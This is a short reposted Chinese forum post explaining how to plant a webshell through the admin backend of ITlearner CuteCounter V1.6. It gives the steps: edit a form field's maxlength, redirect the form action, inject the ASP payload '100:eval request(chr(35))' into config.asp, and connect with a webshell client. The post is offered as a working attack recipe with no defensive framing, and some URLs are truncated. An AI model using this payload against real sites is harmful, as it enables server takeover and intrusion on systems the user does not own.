[转载]ITlearner CuteCounter V1.6后台获得webshell
信息来源:未知进入[url]http://url/admin.asp?acti......??[/url]查找<td><input name="RecordNum" type="text" id="RecordNum" value="100" size="40" maxlength="3"></td>修改maxlength="3"为maxlength="50">然后查找 <form name="form1" method="post" action="?Action=SaveConfig">处修改为action="[url]http://url/admin?Action=S......?[/url]为100条框输入100:eval request(chr(35))//此处没有哪个"的然后保存设置后提示成功后用海洋eval连接[url]http://url/config.asp[/url]文件就获得一个webshell!
页:
[1]